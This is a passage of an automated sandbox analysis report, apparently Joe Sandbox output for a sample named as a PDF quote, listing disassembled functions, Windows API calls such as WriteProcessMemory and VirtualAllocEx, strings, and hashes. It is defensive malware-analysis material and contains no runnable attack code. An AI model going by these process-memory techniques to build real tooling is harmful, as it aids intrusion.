                                                                    • CoInitialize.OLE32(00000000), ref: 00ECBA47
                                                                    • CoCreateInstance.OLE32(00EF2D6C,00000000,00000001,00EF2BDC,?), ref: 00ECBA60
                                                                    • CoUninitialize.OLE32 ref: 00ECBA7D
                                                                      • Part of subcall function 00E69997: __itow.LIBCMT ref: 00E699C2
                                                                      • Part of subcall function 00E69997: __swprintf.LIBCMT ref: 00E69A0C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                    • String ID: .lnk
                                                                    • API String ID: 2126378814-24824748
                                                                    • Opcode ID: a0269632d51c1f4a048a93aebfc087a11bb03178cde7526a1e18c68c944c19d2
                                                                    • Instruction ID: 9274bab0d162d7e0d61fe67e24a89a1ebadfb349f33f0da02e1cd989b289cdd3
                                                                    • Opcode Fuzzy Hash: a0269632d51c1f4a048a93aebfc087a11bb03178cde7526a1e18c68c944c19d2
                                                                    • Instruction Fuzzy Hash: 10A144756043059FCB14DF14C595E6ABBE5BF88314F04998CF899AB3A2CB32EC46CB91
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 00EBB780
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container$%
                                                                    • API String ID: 3565006973-1286912533
                                                                    • Opcode ID: 7c08ca00bced8cd406047c96e6292b64c40a7d6b418aac5096061093ae1a74ef
                                                                    • Instruction ID: 07d838a9d51b6a0e1a2e48505952bbf2d29d4c4e5739fd3be41569043ddbf432
                                                                    • Opcode Fuzzy Hash: 7c08ca00bced8cd406047c96e6292b64c40a7d6b418aac5096061093ae1a74ef
                                                                    • Instruction Fuzzy Hash: 8E9139706002019FDB54DF64C884BA7BBF9BF48714F14956EF94AEB2A1DBB0E844CB50
                                                                    APIs
                                                                    • __startOneArgErrorHandling.LIBCMT ref: 00E8521D
                                                                      • Part of subcall function 00E90270: __87except.LIBCMT ref: 00E902AB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorHandling__87except__start
                                                                    • String ID: pow
                                                                    • API String ID: 2905807303-2276729525
                                                                    • Opcode ID: ef28be24227729b233d011b579a759d8ffe1ad2b38fc13c4abeb7470baeadbdf
                                                                    • Instruction ID: 3bee2fa4f98475be8f1d5b01b32236fe599975d604c5d05707217a7d96224469
                                                                    • Opcode Fuzzy Hash: ef28be24227729b233d011b579a759d8ffe1ad2b38fc13c4abeb7470baeadbdf
                                                                    • Instruction Fuzzy Hash: 66515662A0CA01DFDF11B714C9413BE6BE4AB40714FA4AD58E4DDB21B9EF348DC89B46
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$+
                                                                    • API String ID: 0-2552117581
                                                                    • Opcode ID: 42c26c7c66f4b370c89fdbc0d7ff8ceaa7e6717f7a2f531dff5c3c5fda54d5b4
                                                                    • Instruction ID: f7e83ca27f83eef3d1c07b29b3680ad372aef271f423fb6a3b591b6ca10acf9b
                                                                    • Opcode Fuzzy Hash: 42c26c7c66f4b370c89fdbc0d7ff8ceaa7e6717f7a2f531dff5c3c5fda54d5b4
                                                                    • Instruction Fuzzy Hash: 5F513F3610424A9FCF26EF68C4D4BFABBA0EF16314F146055EC99BB2A1C7709C46CB60
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$_free
                                                                    • String ID: Oa
                                                                    • API String ID: 2620147621-3945284152
                                                                    • Opcode ID: 1f54088781295b26635d20da0d00a8b9a62d68357f7299793ebff03bcb6c742a
                                                                    • Instruction ID: 495ca134457a7888261af0f358cadf0900820bb44f20b45a8f1000f466781986
                                                                    • Opcode Fuzzy Hash: 1f54088781295b26635d20da0d00a8b9a62d68357f7299793ebff03bcb6c742a
                                                                    • Instruction Fuzzy Hash: A0515B716093419FDB64CF28C881B6ABBE1FF89314F04992DE98DA7361D731E901CB42
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$_memmove
                                                                    • String ID: ERCP
                                                                    • API String ID: 2532777613-1384759551
                                                                    • Opcode ID: 29603c7f0ae2d68af141cd10845b4f30aefb7396a4ce6c1cca9ab12e5f469402
                                                                    • Instruction ID: f1660b0e3fa301eafc17318d351c7ef2c1e349803f63d16d3814ade1f27d01e1
                                                                    • Opcode Fuzzy Hash: 29603c7f0ae2d68af141cd10845b4f30aefb7396a4ce6c1cca9ab12e5f469402
                                                                    • Instruction Fuzzy Hash: 4751AE719007099BDB24DF65C8917EAB7F4FF44318F20956EE95EEB241E770AA84CB80
                                                                    APIs
                                                                      • Part of subcall function 00EC17ED: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EB9558,?,?,00000034,00000800,?,00000034), ref: 00EC1817
                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EB9B01
                                                                      • Part of subcall function 00EC17B8: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EB9587,?,?,00000800,?,00001073,00000000,?,?), ref: 00EC17E2
                                                                      • Part of subcall function 00EC170F: GetWindowThreadProcessId.USER32(?,?), ref: 00EC173A
                                                                      • Part of subcall function 00EC170F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EB951C,00000034,?,?,00001004,00000000,00000000), ref: 00EC174A
                                                                      • Part of subcall function 00EC170F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EB951C,00000034,?,?,00001004,00000000,00000000), ref: 00EC1760
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EB9B6E
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EB9BBB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 9d6b3b2f041d42c2e45b74af00321f1f9687e93209b878d804bccd7e5610b6b0
                                                                    • Instruction ID: c89b54950a37ce0b1527bcde52260803dace3a6daf7e4ae086137909af79d4c7
                                                                    • Opcode Fuzzy Hash: 9d6b3b2f041d42c2e45b74af00321f1f9687e93209b878d804bccd7e5610b6b0
                                                                    • Instruction Fuzzy Hash: 25412C76900218AFDB10DFA4CD85FDEBBB8EF0A300F104099FA55B7191DA716E45CBA1
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EEF910,00000000,?,?,?,?), ref: 00EE7A11
                                                                    • GetWindowLongW.USER32 ref: 00EE7A2E
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EE7A3E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: 4c10ab7a3116efc242adbdc5f6b54b173d45e585cb1ea21221d264023e47ac19
                                                                    • Instruction ID: eb4ec80065953bc1e51780ecee08a6d91abb2a43e1d2f64a013dbbb4a496bc3f
                                                                    • Opcode Fuzzy Hash: 4c10ab7a3116efc242adbdc5f6b54b173d45e585cb1ea21221d264023e47ac19
                                                                    • Instruction Fuzzy Hash: C431FE3124464AABDB118E39DC41BEA77A9EF44328F205724F8B9A22E1D731ED508B50
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EE7493
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EE74A7
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EE74CB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: 374460210e32f5657c96013ee377eb3c1caa2e5e2e71214a4adfc99365163c69
                                                                    • Instruction ID: e10ad31b03a432cca862b1acb4fb559d76458ea671a6115a019bf41d763117e0
                                                                    • Opcode Fuzzy Hash: 374460210e32f5657c96013ee377eb3c1caa2e5e2e71214a4adfc99365163c69
                                                                    • Instruction Fuzzy Hash: 9121BF3250025DABDF218E91DC82FEA3BA9EF48724F111214FE647B1D0D6B5A895DBA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EE7C7C
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EE7C8A
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EE7C91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: bb794ba59398b9a08393fc902f1dc78e6f08529973ace22d535a775316482f03
                                                                    • Instruction ID: 5ad1b129958432d82642a7d7b39befa327fd53607e8e7625baf9685ad90cefcd
                                                                    • Opcode Fuzzy Hash: bb794ba59398b9a08393fc902f1dc78e6f08529973ace22d535a775316482f03
                                                                    • Instruction Fuzzy Hash: 0821ACB160424DAFDB10DF24EC81CB737EDEF4A398B140459FA00AB2A1CB70EC418BA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EE6D6D
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EE6D7D
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EE6DA2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: 0012b7cfe8050cfeb39ab6fe60d4fe34bf1350004a0f7850dd2a4c7a89a6e7cf
                                                                    • Instruction ID: 22e93237d2555a9bd73d96375ee65c05734ecfe753ea1797a3f86ce9af7df18b
                                                                    • Opcode Fuzzy Hash: 0012b7cfe8050cfeb39ab6fe60d4fe34bf1350004a0f7850dd2a4c7a89a6e7cf
                                                                    • Instruction Fuzzy Hash: 1121F23261015CBFDF119F55DC84FEB3BAAEF997A8F519124F900AB190C671AC5187A0
                                                                    APIs
                                                                    • __snwprintf.LIBCMT ref: 00ED3B7C
                                                                      • Part of subcall function 00E67F41: _memmove.LIBCMT ref: 00E67F82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __snwprintf_memmove
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d$%
                                                                    • API String ID: 3506404897-3879706725
                                                                    • Opcode ID: 4d3e36a46c0a1f0e35cf2c737a7b4b81723cfbeaed21055d9c151184ea72b43d
                                                                    • Instruction ID: 07af8f7212f028b33367dea03f9eeb9acb00a0d409e19e72feba2cbbfc15b105
                                                                    • Opcode Fuzzy Hash: 4d3e36a46c0a1f0e35cf2c737a7b4b81723cfbeaed21055d9c151184ea72b43d
                                                                    • Instruction Fuzzy Hash: E0215035A40218AACF14EF64DC92EEE77E4FB44744F40649AF445BB241DA31EE46CBA2
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EE77A4
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EE77B9
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EE77C6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 42654bd5bf80ecd5b9f523499b8ac5a87ff1a2dcf57f8e81d28f66e221dc9998
                                                                    • Instruction ID: 749e158b5d6c4e6a05241e38c4d94eae6466d93e0e6c0f2254b162cd28e4555b
                                                                    • Opcode Fuzzy Hash: 42654bd5bf80ecd5b9f523499b8ac5a87ff1a2dcf57f8e81d28f66e221dc9998
                                                                    • Instruction Fuzzy Hash: B111E77225424CBBDF105F61DC45FE73BA9EF89B55F011119F641A60D0D671E851DB20
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E64C2E), ref: 00E64CA3
                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E64CB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 2574300362-192647395
                                                                    • Opcode ID: 463006f595a3e1cc7689e2e3a81364975d94707ec08843b791068791ff8506b2
                                                                    • Instruction ID: f33614c9e62d0b746b0483de87821c87876d830354754c985dc7bc8fca442ed8
                                                                    • Opcode Fuzzy Hash: 463006f595a3e1cc7689e2e3a81364975d94707ec08843b791068791ff8506b2
                                                                    • Instruction Fuzzy Hash: 7DD02B7050172FCFD7204F32DD48602B2D5AF00780B20D83DE881FA290D770C480C610
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E64CE1,?), ref: 00E64DA2
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E64DB4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-1355242751
                                                                    • Opcode ID: f3fc7cafebd2b5b3036a8b236b6cf00a7852713e687df647fcb5533380296ae9
                                                                    • Instruction ID: d09461eb387199134375e55498fa51720237d008baa11c09712f6ae3781d94af
                                                                    • Opcode Fuzzy Hash: f3fc7cafebd2b5b3036a8b236b6cf00a7852713e687df647fcb5533380296ae9
                                                                    • Instruction Fuzzy Hash: A7D05BB0950717CFD7205F32D84864676D5AF05799B15D83DE8C5FA190E770D4C0C650
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E64D2E,?,00E64F4F,?,00F252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00E64D6F
                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E64D81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                    • API String ID: 2574300362-3689287502
                                                                    • Opcode ID: f37a0f5b329ed3a7a663ba67b441a629f846a923a01ae9db138663d7cfaf26fe
                                                                    • Instruction ID: 6fa1a5c1cf6b82b18ca039d1cb0c1bb71e4deaae9c3a8b7539d5d65d01192dca
                                                                    • Opcode Fuzzy Hash: f37a0f5b329ed3a7a663ba67b441a629f846a923a01ae9db138663d7cfaf26fe
                                                                    • Instruction Fuzzy Hash: 60D0C770900B5BCFC7208F32E84820672E9AF443A6B00C83EE482EA2A0E670C880CA10
                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00EE10C1), ref: 00EE0E80
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EE0E92
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1736202388.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                                                    • Associated: 00000000.00000002.1735874657.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000EEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736306351.0000000000F14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736531483.0000000000F1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1736561931.0000000000F27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_e60000_quote894590895pdf.jbxd
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
